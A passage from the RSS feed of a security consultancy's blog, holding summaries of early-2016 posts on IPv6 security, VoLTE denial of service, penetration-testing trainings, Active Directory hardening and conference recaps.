      <description>&lt;p&gt;Dear Readers,&lt;/p&gt;&#xA;&lt;p&gt;It’s me again with another teaser for an upcoming workshop at the &lt;a href=&#34;https://www.troopers.de/ipv6-security-summit/&#34;&gt;IPv6 Security Summit&lt;/a&gt;. This one is a classic! If you happen to deploy IPv6 in your environment in the near future, but didn’t had the time to think about the security implications, this &lt;a href=&#34;https://www.troopers.de/events/ipv6-security-summit-2016/614_basic_ipv6_attacks__defenses_hands-on_workshop/&#34;&gt;workshop&lt;/a&gt; is the right place to start.&lt;/p&gt;&#xA;&lt;p&gt;We will start the workshop with a quick refresher of the core behavior of IPv6 to make sure that every attendee is on the same page. Before we start discussing and demonstrating various IPv6 attacks, we dive into (a little more abstract) topic of why IPv6 security actually isn’t that easy to implement. We will continue with IPv6 attacks targeted at the local link. Rafael and I will introduce commonly used IPv6 attack tools as well as performing various attacks in a dedicated lab environment. Every attendee is encouraged to participate in these exercises.  We will provide you with the necessary tools; you just have to bring a laptop with (ideally) Linux installed. We will prepare some virtual machines including VMware Player in case your corporate laptop runs Windows.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Multiple Address Family OSPFv3</title>
      <link>https://insinuator.net/2016/02/multiple-address-family-ospfv3/</link>
      <pubDate>Wed, 10 Feb 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/02/multiple-address-family-ospfv3/</guid>
      <description>&lt;p&gt;Dear Readers,&lt;/p&gt;&#xA;&lt;p&gt;today I want to talk about OSPFv3. I won’t cover the glory details of &lt;a href=&#34;http://tools.ietf.org/html/rfc5340&#34;&gt;OSPFv3&lt;/a&gt;, there are smarter guys than me out there who did that &lt;a href=&#34;http://packetlife.net/blog/2010/mar/2/ospfv2-versus-ospfv3/&#34;&gt;already&lt;/a&gt; 😉 and there are great resources to familiarize yourself with the protocol. However, it should be noted that OSPFv3 is not only OSPF for IPv6, OSPFv3 brought some major enhancements compared to OSPFv2. Wouldn’t it be cool to benefit from the enhancements in the IPv4 world as well?&lt;/p&gt;</description>
    </item>
    <item>
      <title>#TR16 IPv6 Security Summit Teaser: First-Hop-Security on HP Network Devices</title>
      <link>https://insinuator.net/2016/02/%23tr16-ipv6-security-summit-teaser-first-hop-security-on-hp-network-devices/</link>
      <pubDate>Tue, 09 Feb 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/02/%23tr16-ipv6-security-summit-teaser-first-hop-security-on-hp-network-devices/</guid>
      <description>&lt;p&gt;Hello Everybody,&lt;/p&gt;&#xA;&lt;p&gt;Today I want to give you a little teaser about my upcoming talk at the &lt;a href=&#34;https://www.troopers.de/ipv6-security-summit/&#34;&gt;IPv6 Security Summit&lt;/a&gt; about &lt;em&gt;First-Hop-Security&lt;/em&gt; on HP devices. In the past I presented on about First-Hop-Security in the &lt;a href=&#34;https://www.troopers.de/events/troopers13/363_securing_ipv6_in_the_cisco_space/&#34;&gt;Cisco&lt;/a&gt; realm and in &lt;a href=&#34;https://www.troopers.de/events/troopers15/482_ipv6_first_hop_security_in_virtualized_environments/&#34;&gt;virtualized e&lt;/a&gt;nvironments. Until recently, Cisco was mostly the only vendor who had a sufficient implementation of various IPv6 security features on their access-layer switches, but HP closed the gap considerably and it’s time to have an in-depth look at their implementation of those features.&lt;/p&gt;</description>
    </item>
    <item>
      <title>#TR16 IPv6 Security Summit Teaser: Building a Reliable and Secure IPv6 WiFi Network</title>
      <link>https://insinuator.net/2016/02/%23tr16-ipv6-security-summit-teaser-building-a-reliable-and-secure-ipv6-wifi-network/</link>
      <pubDate>Mon, 08 Feb 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/02/%23tr16-ipv6-security-summit-teaser-building-a-reliable-and-secure-ipv6-wifi-network/</guid>
      <description>&lt;p&gt;Hi everyone,&lt;/p&gt;&#xA;&lt;p&gt;some of you may have seen my last &lt;a href=&#34;https://www.insinuator.net/2016/02/dhcpv6-option-52-on-cisco-dhcpv6-server/&#34;&gt;blog post&lt;/a&gt; about the preparation of the Troopers network. Today I want to give you a little teaser on what to expect for the &lt;a href=&#34;https://www.troopers.de/events/ipv6-security-summit-2016/672_case_study_building_a_secure_ipv6_guest_wifi_network/&#34;&gt;talk&lt;/a&gt; I will present during the IPv6 Security Summit. As the title implies, it’s not only about building a secure IPv6 WiFi, but also a reliable one. One might think that there aren’t many differences in comparison to IPv4, but the heavy reliance on multicast of IPv6 does have implications for Wi-Fi networks in general.&lt;/p&gt;</description>
    </item>
    <item>
      <title>DHCPv6 Option 52 on Cisco DHCPv6 Server</title>
      <link>https://insinuator.net/2016/02/dhcpv6-option-52-on-cisco-dhcpv6-server/</link>
      <pubDate>Sat, 06 Feb 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/02/dhcpv6-option-52-on-cisco-dhcpv6-server/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;I am currently preparing the &lt;a href=&#34;https://www.troopers.de&#34;&gt;Troopers&lt;/a&gt; network in a lab environment to ensure that we all will have a smooth Wi-Fi experience during Troopers. I wanted to spice things up a little bit for the Wi-Fi deployment (more on that in a following blogpost) and get rid of IPv4 wherever possible. Our Wi-Fi infrastructure consists of typical Cisco Access Points (1602) and a 2504 Wireless LAN Controller. Beginning with WLC image 8.0 it is finally supported to establish the CAPWAP tunnel between the AP and the WLC over IPv6, which is awesome and I wanted to implement it right away.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Denial of Service attacks on VoLTE</title>
      <link>https://insinuator.net/2016/02/denial-of-service-attacks-on-volte/</link>
      <pubDate>Wed, 03 Feb 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/02/denial-of-service-attacks-on-volte/</guid>
      <description>&lt;p&gt;Some weeks ago Hendrik explained in his blogpost &lt;a href=&#34;https://www.insinuator.net/2016/01/security-analysis-of-volte-part-1/&#34;&gt;Security Analysis of VoLTE, Part 1&lt;/a&gt; some attack vectors for Voice over LTE (VoLTE). One attack vector introduced was Denial of Service (DoS), which I also discussed in my Masterthesis “Evaluation of IMS security and Developing penetration tests of IMS”.&lt;/p&gt;&#xA;&lt;p&gt;In general, DoS attacks aim to prevent a system or a network from efficiently providing its service to legitimate users . The impact of such attacks can vary from a big degradation of quality to total blockage. DoS can occur on users level, where a user or a group of users cannot use the service. But the common conception of DoS is on the service level, where the whole service is broken, unstable or totally down. This blog post is about targeting DoS of the whole VoLTE service by attacking IMS.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TelcoSecDay 2016 – Second Round of Talks</title>
      <link>https://insinuator.net/2016/02/telcosecday-2016-second-round-of-talks/</link>
      <pubDate>Wed, 03 Feb 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/02/telcosecday-2016-second-round-of-talks/</guid>
      <description>&lt;p&gt;I am very happy to announce the second round of talks for the &lt;a href=&#34;https://www.troopers.de/events/troopers16/580_telcosecday_2016_invitation_only/&#34;&gt;TelcoSecDay 2016&lt;/a&gt;. As mentioned in my &lt;a href=&#34;https://www.insinuator.net/2016/01/telcosecday-first-round-of-talks/&#34;&gt;previous post&lt;/a&gt; it will take place on March 15th. All invitations should be out by now; if you think you can contribute to the group and you are willing to join us – please let me know (&lt;a href=&#34;mailto:hschmidt@ernw.de&#34;&gt;hschmidt@ernw.de&lt;/a&gt;).&lt;/p&gt;&#xA;&lt;p&gt;Still, not all talks are confirmed but the newly published talks will provide an idea about TSD 2016 and its discussions.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Developing an Enterprise IPv6 Security Strategy / Part 6: Controls on the Host Level</title>
      <link>https://insinuator.net/2016/02/developing-an-enterprise-ipv6-security-strategy-/-part-6-controls-on-the-host-level/</link>
      <pubDate>Tue, 02 Feb 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/02/developing-an-enterprise-ipv6-security-strategy-/-part-6-controls-on-the-host-level/</guid>
      <description>&lt;p&gt;In this part of the series (for the other parts see &lt;a href=&#34;https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-1-baseline-analysis-of-ipv4-network-security/&#34;&gt;[1]&lt;/a&gt;, &lt;a href=&#34;https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-2-network-isolation-on-the-routing-layer/&#34;&gt;[2]&lt;/a&gt;, &lt;a href=&#34;https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-3-traffic-filtering-in-ipv6-networks-i/&#34;&gt;[3]&lt;/a&gt;, &lt;a href=&#34;https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-4-traffic-filtering-in-ipv6-networks-ii/&#34;&gt;[4]&lt;/a&gt;, &lt;a href=&#34;https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-5-first-hop-security-features/&#34;&gt;[5]&lt;/a&gt;) we’ll discuss approaches to implement security measures suited to protect from IPv6-related threats on the host level.&lt;/p&gt;&#xA;&lt;p&gt;These can be grouped into the following generic categories each of which will be described in more detail in the following:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;“Minimal machine” approach&lt;/li&gt;&#xA;&lt;li&gt;Static configuration of IPv6 parameters&lt;/li&gt;&#xA;&lt;li&gt;Tweaking the behavior of IPv6-related mechanisms/protocols&lt;/li&gt;&#xA;&lt;li&gt;Local packet filtering&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Some of you might recall that we published IPv6 hardening guides for both &lt;a href=&#34;https://www.ernw.de/download/ERNW_Guide_to_Securely_Configure_Linux_Servers_For_IPv6_v1_0.pdf&#34;&gt;Linux&lt;/a&gt; and &lt;a href=&#34;https://www.ernw.de/download/ERNW_Guide_to_Configure_Securely_Windows_Servers_For_IPv6_v1_0.pdf&#34;&gt;Windows&lt;/a&gt; a while ago and we’ll reference those exact documents below, by [Hard_Linux] and [Hard_Windows] respectively.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Pentesting with Metasploit #TR16 Training</title>
      <link>https://insinuator.net/2016/02/pentesting-with-metasploit-%23tr16-training/</link>
      <pubDate>Tue, 02 Feb 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/02/pentesting-with-metasploit-%23tr16-training/</guid>
      <description>&lt;p&gt;In this year’s MSF training we will guide you through the typical steps of the pentest cycle: information gathering, attacking and looting your targets. For each step, demos and exercises will help you deepen and test your newly acquired knowledge. In addition to the typical penetration-test scenarios you will also learn several advanced aspects of the framework such as: how writing your own metasploit modules works, how to export payloads and make them undetected. With a final exercise each day you can finally challenge yourself and apply what you have learned!&lt;/p&gt;</description>
    </item>
    <item>
      <title>Damn Vulnerable Safe</title>
      <link>https://insinuator.net/2016/01/damn-vulnerable-safe/</link>
      <pubDate>Sat, 30 Jan 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/01/damn-vulnerable-safe/</guid>
      <description>&lt;p&gt;A while back Stefan and I held a little crash course/orientation run on hardware hacking at a German Fachhochschule. Planning to use something “real” we went for a simple electronic safe with a bunch of different vulnerabilities. I guess most security guys who spend a fair amount of time in hotels will understand this choice. As we needed something we could rely on would break, we stripped the device and swapped the original electronics for our own. The result was the “Damn Vulnerable Safe”.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dynamic IDA Enrichment (aka. DIE)</title>
      <link>https://insinuator.net/2016/01/dynamic-ida-enrichment-aka.-die/</link>
      <pubDate>Thu, 28 Jan 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/01/dynamic-ida-enrichment-aka.-die/</guid>
      <description>&lt;p&gt;Last year on the &lt;a href=&#34;https://hex-rays.com/contests/2015/index.shtml&#34;&gt;Hex-rays plugin Contest&lt;/a&gt; the Dynamic IDA Enrichment (DIE) plugin won first place, so we decided to have a look and play around with it.&lt;/p&gt;&#xA;&lt;p&gt;DIE extends IDA to add Dynamic Data to the static analysis. So after the installation, we are able to perform the static analysis using a lot of supporting information from the actual execution of the binary under assessment.&lt;/p&gt;&#xA;&lt;p&gt;Since DIE is purely written in Python you will need at least Python 2.7 and IDA Versions prior to 6.8 won´t work. In the current version DIE will only work on Windows which will hopefully soon be available cross-platform.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS16 Training Teaser: Dos and Don’ts of Secure Active Directory Administration</title>
      <link>https://insinuator.net/2016/01/troopers16-training-teaser-dos-and-donts-of-secure-active-directory-administration/</link>
      <pubDate>Wed, 27 Jan 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/01/troopers16-training-teaser-dos-and-donts-of-secure-active-directory-administration/</guid>
      <description>&lt;p&gt;In the last few years, attack techniques which fall in the categories of “Credential Theft” or “Credential Reuse” have grown into one of the biggest threats to Microsoft Windows environments. Microsoft has stated more than one time, that nearly almost all of their customers that run Active Directory have experienced “Pass-the-Hash” (PtH) attacks recently.&lt;a href=&#34;#_ftn1&#34;&gt;[1]&lt;/a&gt; Once an attacker gains an initial foothold on a single system in the environment it takes often less than 48 hours until the entire Active Directory infrastructure is compromised. To defend against this kind of attacks, a well-planned approach is required as part of a comprehensive security architecture and operations program. As breach has to be assumed&lt;a href=&#34;#_ftn2&#34;&gt;[2]&lt;/a&gt;, this includes a preventative mitigating control strategy, where technical and organizational controls are implemented, as well as preparations against insider attacks. This is mainly achieved by partitioning the credential flow in order to firstly limit their exposure and secondly limit their usefulness if an attacker was able to get them. Although we spoke last year at Troopers 15 about “How to Efficiently Protect Active Directory from Credential Theft &amp;amp; Large Scale Compromise”&lt;a href=&#34;#_ftn3&#34;&gt;[3]&lt;/a&gt;, we would like to summarize exemplary later in this post Active Directory pentest findings that we classified in four categories in order to better understand what goes typically wrong and thus has to be addressed. For a better understanding of the overall security goals, we classified the findings as to belonging as a security best practice violation of the following categories:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Web Hacking Special Ops Workshop @ TR16</title>
      <link>https://insinuator.net/2016/01/web-hacking-special-ops-workshop-@-tr16/</link>
      <pubDate>Tue, 26 Jan 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/01/web-hacking-special-ops-workshop-@-tr16/</guid>
      <description>&lt;p&gt;&lt;strong&gt;Trooper!&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;You passed Hacking 1on1 with flying colors?&lt;/p&gt;&#xA;&lt;p&gt;You evade web application firewalls as they would be opened doors?&lt;/p&gt;&#xA;&lt;p&gt;You have successfully exploitated CVE-2015-8769?&lt;/p&gt;&#xA;&lt;p&gt;Then it’s time for the next challenge! Follow us down the rabbit hole to the not so well known attacks against modern web applications.&lt;/p&gt;&#xA;&lt;p&gt;At Troopers16 we will be presenting the second iteration of our WebHackingSpecialOps workshop in which more advanced techniques to break current web application technologies will be explained. On the first day there will be an introduction that gives a quick overview on the well-known attacks like SQLi, XSS and XSRF. Then attacks will be shown that build upon these “old” vectors including blind/clientside SQLi, NoSQLi and some specialties on NodeJS, the javascript based server-side runtime. Next to these technical topics several formal subjects like 3rd library handling and a guideline on how to deploy TLS in a secure way will be given. Especially the 3rd party library chapter since they have become more and more relevant, as in the near past several major vulnerabilities in such libraries were found which gave attackers the chance to break web applications that were based on these. This shows that even though developers do a great job and developer companies get familiar with secure development lifecycles, there are still problems depending on the used technologies that cannot be addressed easily. One example of such a vulnerability is the object deserialization flaw in the Apache Commons Collections library, which was discovered at the beginning of 2015 and got attention in November, when two researchers presented their &lt;a href=&#34;http://frohoff.github.io/appseccali-marshalling-pickles/&#34;&gt;talk on AppSecCali2015&lt;/a&gt; and showed how easy remote code execution can be done through this kind of flaw. The details of all kind of object deserialization (as almost all current scripting/high level programming languages support this feature) will be part of our course. Next to these topics a deep-dive into current crypto algorithms, their usecases concerning webapplications and their flaws will be given. Within every part of this course several demos and hands-on exercises will be done, so every attendee will be able to apply new knowledge directly. Don’t miss this chance to improve, Trooper!&lt;/p&gt;</description>
    </item>
    <item>
      <title>Hacking 101 Training at TROOPERS16</title>
      <link>https://insinuator.net/2016/01/hacking-101-training-at-troopers16/</link>
      <pubDate>Mon, 25 Jan 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/01/hacking-101-training-at-troopers16/</guid>
      <description>&lt;p&gt;This year’s &lt;a href=&#34;https://www.troopers.de/events/troopers16/572_hacking_101/&#34;&gt;Hacking 101&lt;/a&gt; workshop at TROOPERS16 will give attendees an insight into the hacking techniques required for penetration testing. These techniques will cover various topics like information gathering, network mapping, vulnerability scanning, web application hacking, low-level exploitation and more.&lt;/p&gt;&#xA;&lt;p&gt;During this workshop you will learn, step by step, a testing methodology that is applicable to the majority of scenarios. So imagine you have to assess the security of a system running on the Internet. How would you start? First, you need a good understanding about the target, including running services or related systems. Just scanning an IP will most likely not reveal a lot of information about the system. The gathered information may help you to identify communication relations of services that could include vulnerabilities. A brief understanding of the target and it’s related systems/services/applications will make scanning and identifying vulnerabilities a lot easier and more effective. Then, the last step will be the exploitation of the identified vulnerabilities, with the ultimate aim to get access to the target system and pivot to other, probably internal, systems and resources.&lt;/p&gt;</description>
    </item>
    <item>
      <title>32C3 Recap – Part 2</title>
      <link>https://insinuator.net/2016/01/32c3-recap-part-2/</link>
      <pubDate>Sat, 16 Jan 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/01/32c3-recap-part-2/</guid>
      <description>&lt;p&gt;Hello everybody and welcome to the second part of our 32C3 recap!&lt;/p&gt;&#xA;&lt;p&gt;In case you didn’t see &lt;a href=&#34;http://www.insinuator.net/2016/01/32c3-recap-part1/&#34;&gt;the first part&lt;/a&gt;, make sure to check it out 😉&lt;/p&gt;&#xA;&lt;h2 id=&#34;logjam&#34;&gt;Logjam&lt;/h2&gt;&#xA;&lt;p&gt;by **Nadia Heninger &amp;amp; Alex Halderman&lt;br&gt;&#xA;**&lt;a href=&#34;https://media.ccc.de/v/32c3-7288-logjam_diffie-hellman_discrete_logs_the_nsa_and_you&#34;&gt;Video&lt;/a&gt; | &lt;a href=&#34;https://lab.dsst.io/32c3-slides/slides/7288.pdf&#34;&gt;Slides&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;This talk was held by Nadia Heninger and Alex Halderman on the second day of the congress. Both work in academic and the field of cryptology. They talked about the “Logjam”-Attack they and several colleagues discovered and published in may of 2014. They started their talk by explaining how they uncovered the vulnerability which was quite interesting since Logjam was no breaking news anymore. And well it was inspired by the congress of the year before, 31C3. The research was conducted because they got curious how the NSA might be able to decrypt VPN traffic as stated by Jacob Applebaum and Laura Poitras in their “reconstructing narratives” talk.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TelcoSecDay – First Round of Talks</title>
      <link>https://insinuator.net/2016/01/telcosecday-first-round-of-talks/</link>
      <pubDate>Sat, 16 Jan 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/01/telcosecday-first-round-of-talks/</guid>
      <description>&lt;p&gt;Dear all,&lt;br&gt;&#xA;This year the &lt;a href=&#34;https://www.troopers.de/events/troopers16/580_telcosecday_2016_invitation_only/&#34;&gt;TelcoSecDay&lt;/a&gt; will take place on March 15th. For those of you who does not know about: the TelcoSecDay it is a sub-event of &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers&lt;/a&gt; bringing together researchers, vendors and practitioners from the telecommunication / mobile security field.&lt;/p&gt;&#xA;&lt;p&gt;The event is celebrating its 5th anniversary now, that’s why I’d like to say “thank you” to everybody taking part at this very great discussion round in the last few years. We always had a lot of very good feedback and interesting discussions and the increasing participation list of operators from year to year says (almost) everything!&lt;/p&gt;</description>
    </item>
    <item>
      <title>5th Round of TROOPERS16 Talks Accepted</title>
      <link>https://insinuator.net/2016/01/5th-round-of-troopers16-talks-accepted/</link>
      <pubDate>Thu, 14 Jan 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/01/5th-round-of-troopers16-talks-accepted/</guid>
      <description>&lt;p&gt;Happy 2016 everyone! We are &lt;strong&gt;exactly&lt;/strong&gt; 2 months away from the start of TROOPERS16!! Speakers and Trainers across the globe are polishing (or in some cases creating) their PowerPoints to use while delivering their highly technical and entertaining talks. While we here at TR HQ are busy tweaking orders, creating challenges to boggle the mind and test your skills, and of course working on some top secret fun. 😉&lt;/p&gt;&#xA;&lt;p&gt;#BestWeekEver&lt;/p&gt;&#xA;&lt;p&gt;Your TROOPERS Team&lt;/p&gt;</description>
    </item>
    <item>
      <title>Things to Consider When Starting Your IPv6 Deployment</title>
      <link>https://insinuator.net/2016/01/things-to-consider-when-starting-your-ipv6-deployment/</link>
      <pubDate>Mon, 11 Jan 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/01/things-to-consider-when-starting-your-ipv6-deployment/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;today I’m going to suspend the “&lt;a href=&#34;https://www.insinuator.net/tag/ipv6/&#34;&gt;Developing an Enterprise IPv6 Security Strategy&lt;/a&gt;” series for a moment and discuss some other aspects of IPv6 deployment.&lt;br&gt;&#xA;We’ve been involved in a number of IPv6 projects in large organizations in the past few years and in many of those there was a &lt;a href=&#34;https://www.ernw.de/download/ERNW_IPv6_Today_Tomorrow.pdf&#34;&gt;planning phase in which several documents were created&lt;/a&gt; (often these include a road map, an address concept/plan and a security concept).&lt;br&gt;&#xA;Point is: at some point it’s getting real ;-), read: IPv6 is actually enabled on some systems. Pretty much all enterprise customers we know start(ed) their IPv6 deployment “at the perimeter”, enabling IPv6 (usually in dual-stack mode) on some systems/services facing the Internet and/or external parties.&lt;br&gt;&#xA;Unfortunately there’s a number of (seemingly small) things that can go wrong in this phase and “little errors” made today are probably meant to stay for a long time (in German we have the nice phrase “Nichts ist so dauerhaft wie ein Provisorium”, and I’m sure people with an IT operations background will understand this even without a translator…).&lt;br&gt;&#xA;In this post I will hence lay out some things to consider when you enable IPv6 on perimeter elements for the first time.&lt;/p&gt;</description>
    </item>
    <item>
      <title>32C3 Recap – Part1</title>
      <link>https://insinuator.net/2016/01/32c3-recap-part1/</link>
      <pubDate>Fri, 08 Jan 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/01/32c3-recap-part1/</guid>
      <description>&lt;p&gt;Every year a group of us are happy to use the holidays to travel to Hamburg to meet other people and learn something new at the 32C3.&lt;/p&gt;&#xA;&lt;p&gt;In this small series we’ll present you recaps of some talks we found most interesting, but you also should make sure to watch the recording of them. 😉&lt;/p&gt;&#xA;&lt;h2 id=&#34;beyond-your-cable-modem--how-to-not-do-docsis-networks&#34;&gt;Beyond your cable modem – How to not do DOCSIS networks&lt;/h2&gt;&#xA;&lt;p&gt;by **Alexander Graf&lt;br&gt;&#xA;**&lt;a href=&#34;https://media.ccc.de/v/32c3-7133-beyond_your_cable_modem&#34;&gt;Video&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Alexander Graf presents (insecurity) insights on how cable modems work and connect to the ISP.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Another Perspective in Vulnerability Disclosure</title>
      <link>https://insinuator.net/2016/01/another-perspective-in-vulnerability-disclosure/</link>
      <pubDate>Thu, 07 Jan 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/01/another-perspective-in-vulnerability-disclosure/</guid>
      <description>&lt;p&gt;As you know we (as in &lt;a href=&#34;https://www.ernw.de/&#34;&gt;ERNW&lt;/a&gt;) are quite involved when it comes to vulnerability disclosure and we’ve tried to contribute to a discussion at several occasions, such as &lt;a href=&#34;https://www.insinuator.net/2015/07/reflections-on-vulnerability-disclosure/&#34;&gt;Reflections on Vulnerability Disclosure&lt;/a&gt; and &lt;a href=&#34;https://www.ernw.de/download/ERNW_Newsletter_50_Vulnerability_Disclosure_Reflections_CaseStudy.pdf&#34;&gt;ERNW Newsletter 50 Vulnerability Disclosure Reflections Case Study&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;In this post I want to add (yet) another perspective, motivated by a disclosure procedure which just happened recently.&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://twitter.com/todb&#34;&gt;todb’s&lt;/a&gt;  article, &lt;a href=&#34;https://community.rapid7.com/community/infosec/blog/2016/01/05/r7-2015-23-comcast-xfinity-home-security-system-insecure-fail-open&#34;&gt;R7-2015-23: Comcast XFINITY Home Security System Insecure Fail Open&lt;/a&gt; is a well planned public forum vulnerability disclosure. The article itself is very well done: It gives credit to the researcher who discovered the vulnerability and it shows a vulnerability disclosure timeline where Rapid7 reached out to Comcast (the vendor). They even go a step further and publish the link showing the process for discovered vulnerabilities in a Rapid7 product as well as how Rapid7 handles disclosing those vulnerabilities they find in external products. For their internal disclosure process, they make sure to release a patch &lt;em&gt;before&lt;/em&gt; “publicly announcing the vulnerability in the release notes of the update”(&lt;a href=&#34;http://www.rapid7.com/disclosure.jsp&#34;&gt;rapid7 disclosure&lt;/a&gt;).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security Analysis of VoLTE, Part 1</title>
      <link>https://insinuator.net/2016/01/security-analysis-of-volte-part-1/</link>
      <pubDate>Wed, 06 Jan 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/01/security-analysis-of-volte-part-1/</guid>
      <description>&lt;p&gt;Hello everybody,&lt;br&gt;&#xA;this time I’d like to share some thoughts and results about our telco research last year. We gathered a lot of information out of some projects we’d like to share and discuss with you. The following sections also provide an idea of the upcoming Telecommunication Security Workshop I will give with Kevin Redon at Troopers (&lt;a href=&#34;https://www.troopers.de/events/troopers16/573_telco_network_security/&#34;&gt;click&lt;/a&gt;). The workshop will be about Radio Network Security (covered by Kevin) and security aspects of the Core Network (covered by myself), mainly focusing on Voice over LTE (VoLTE). That’s also the topic of today’s post.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Developing an Enterprise IPv6 Security Strategy / Part 5: First Hop Security Features</title>
      <link>https://insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-/-part-5-first-hop-security-features/</link>
      <pubDate>Thu, 31 Dec 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-/-part-5-first-hop-security-features/</guid>
      <description>&lt;p&gt;In the previous parts of this series (&lt;a href=&#34;https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-1-baseline-analysis-of-ipv4-network-security/&#34;&gt;part 1&lt;/a&gt;, &lt;a href=&#34;https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-2-network-isolation-on-the-routing-layer/&#34;&gt;part 2&lt;/a&gt;, &lt;a href=&#34;https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-3-traffic-filtering-in-ipv6-networks-i/&#34;&gt;part 3&lt;/a&gt;, &lt;a href=&#34;https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-4-traffic-filtering-in-ipv6-networks-ii/&#34;&gt;part 4&lt;/a&gt;) we covered several aspects of IPv6 security, mainly on the infrastructure level. In today’s post I will follow up by briefly discussing so-called &lt;em&gt;First Hop Security&lt;/em&gt; features.&lt;/p&gt;&#xA;&lt;p&gt;IPv6 &lt;em&gt;First Hop Security&lt;/em&gt; (“IPv6 FHS”) is a collection of features (initially implemented, and named, by Cisco but available on other platforms too) that can be found on many access layer switches to prevent different attacks in IPv6 networks. The availability of those features is sometimes divided into three phases and started in 2010 with the release of IOS images containing mainly &lt;em&gt;RA Guard&lt;/em&gt; (see below) and port-based IPv6 ACLs. Phase two was released in early 2012 and contained some more features (namely from the “IPv6 Snooping” framework) whereas phase three was released at the end of 2012 and contained some more advanced features (e.g. &lt;em&gt;IPv6 Source Guard&lt;/em&gt;). Nowadays usually “phase one” features are supported on many platforms, at least on physical ones (&lt;a href=&#34;https://www.troopers.de/media/filer_public/9c/76/9c76bcf0-9653-4d70-9b3d-0d38bbfb2c5e/tr15_ipv6_security_summit_fhs_virtualized_environments_v10.pdf&#34;&gt;support on virtual switches is still somewhat lacking&lt;/a&gt;).&lt;br&gt;&#xA;There’s an excellent &lt;a href=&#34;http://docwiki.cisco.com/wiki/FHS&#34;&gt;Cisco FHS Wiki&lt;/a&gt; maintained by &lt;a href=&#34;https://twitter.com/ayourtch&#34;&gt;Andrew Yourtchenko&lt;/a&gt;, &lt;a href=&#34;https://twitter.com/SCOTTHOGG&#34;&gt;Scott Hogg&lt;/a&gt; wrote a &lt;a href=&#34;http://www.gtri.com/ipv6-neighbor-discovery-keep-calm-and-ipv6-on/&#34;&gt;good overview&lt;/a&gt;, as &lt;a href=&#34;http://blog.ipspace.net/2013/07/first-hop-ipv6-security-features-in.html&#34;&gt;did Ivan Pepelnjak&lt;/a&gt;, and &lt;a href=&#34;http://www.rmv6tf.org/wp-content/uploads/2013/04/5-IPv6-Attacks-and-Countermeasures-v1.2.pdf&#34;&gt;this is a nice presentation&lt;/a&gt; on some elements by Jim Small from 2013. Still, from our perspective the main question is: which of those features should be deployed in production networks/can be observed in real-life enterprise networks. Actually it’s only two:&lt;/p&gt;</description>
    </item>
    <item>
      <title>DPRK’s RedStar OS on 32c3</title>
      <link>https://insinuator.net/2015/12/dprks-redstar-os-on-32c3/</link>
      <pubDate>Wed, 30 Dec 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/12/dprks-redstar-os-on-32c3/</guid>
